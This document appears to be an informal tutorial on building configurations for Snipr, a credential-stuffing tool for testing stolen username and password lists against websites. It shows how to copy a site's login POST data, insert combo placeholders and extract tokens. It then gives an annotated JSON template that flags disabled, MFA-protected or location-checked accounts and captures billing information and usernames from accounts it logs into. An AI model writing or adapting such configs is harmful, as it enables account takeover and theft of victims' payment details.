Untitled

Now lets assume after this you login into Google.com, now what your browser do is it sends  a POST request, POST Basically can transfer data from you to the website and then the website returns something like "Login Successful" or redirect you to another homepage with your name on it etc. Now this POST request are usually in form of

username=demonx&password=mystrongpass&token=123123sdasd123212n128312i

Token: Token is basically a security made by website developers to stop bots like you from  cracking accounts too easily. Not all websites have this but lets assume they do. Now, the above  POST request

"username=demonx&password=mystrongpass&token=123123sdasd123212n128312i"

this is done by our browser automatically, now we want to send  this  exactly to google.com so it tells us if its correct or not. This is how we will do it in most cases.

username=&password=&token=+token|1+

Sometimes you wish to change the syntax of PostData meaning the Website wants Token first and after that password, how would you know this? As I said we are just going to clone the request and for that we will see what our browsers sends and clone it. Every browser have Developer tools/Inspect Element(Use Cntrl + SHIFT +  I to open it). We are going to use that to see what happens when you put user and pass.

https://prnt.sc/je6wbw STEP 1
https://prnt.sc/je6xsv STEP 2
http://prntscr.com/je6yy0 STEP 3

Now you've seen the postData send to the website, here it is how we are going to set it in Snipr.

ORIGINAL:

login_form%5Bname%5D=my_email%40gmail.com&login_form%5Bpassword%5D=mystrongpass&login_form%5Bredirect_url%5D=%2F&login_form%5B_token%5D=vlHZXQ-IO-yW1JB9mWrXuySeGmafKSAs3iGLw76J_eU


SNIPR:
login_form%5Bname%5D=&login_form%5Bpassword%5D=&login_form%5Bredirect_url%5D=%2F&login_form%5B_token%5D=+token|1+

     SNIPR CONFIG TEMPLATE

{ \\ THIS IS GENERAL SECTION DEFINES NAME, PROXY ETC
    "General": {
        "name": "Config_name",
        "proxyType": "Proxies/Proxyless",
        "comboType": "Email/User",
        "credit": "Win32.exe"
    },
    "Requests": [ \\  REQUESTS SECTIONS WHERE ALL GET AND POST HAPPENS
        {
            "actionUrl": "POST METHOD USUALLY USED TO POST  USER + PASSWORD + ANY TOKEN TO WEBSITE FOR AUTHENTICATION", \\ request 1
            "method": "POST",
            "contentType": "application\/json; charset=UTF-8",  \\  THIS EXAMPLE USES A JSON SITE, REMOVE IF NOT JSON
            "postData": "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}",  \\ whenever you want " as a string you put \"
            "successKeys": [
                "{\"token\":",
                ""
            ],
            "failureKeys": [
                "Password does not match",
                "This account has been disabled.",
                "\"mfa\": true",
                "New login location detected",


            ],
            "regex": [ \\this site  needs a token to put in headers
                {
                    "name": "token",
                    "pattern": "\"token\": \"([^\"]*)\"",
                    "usedFor": "headers"
                }

            ]
        }, \\ COMMA AFTER EVERY REQUEST HAS BEEN COMPLETED
        {
            "actionUrl": "This one is Get Method generally used to capture or get information after login or before login for token", \\request 2
            "method": "GET",
            "headers": [
                {
                    "name": "Authorization",
                    "value": "+token|1+"
                }
            ],
            "regex": [
                {
                    "name": "billing",
                    "pattern": "\"billing\": \"([^\"]*)\"",
                    "usedFor": "capture"
                }
            ],

            "successKeys": [
                "\"billing\":"
            ]

        },
        {
            "actionUrl": "SOMETIMES YOU NEED MULTIPLE REQUESTS THIS ONE IS USED TO CAPTURE USERNAME IN THE ACCOUNT",\\ request:3
            "method": "GET",
            "headers": [ \\ sometimes you need custom things in headers like a token, this is how you use it
                {
                    "name": "Authorization",
                    "value": "+token|1+" \\ whenever you wish to use a regex/variable put it as +name|1+
                }
            ],
            "regex": [  \\another variable to store username
                {
                    "name": "Cap",
                    "pattern": "\"username\": \"([^\"]*)\"",
                    "usedFor": "capture" \\ this one is used to capture
                }
            ],

            "successKeys": [
                "\"username\":"
            ],
            "capture": [
                "Username - +Cap|1+ | Billing - +billing|1+" \\ this  prints Username - "Our username Request 3"  |  BILLING - "Our Billing from Request 2"

            ]
        }
    ]
}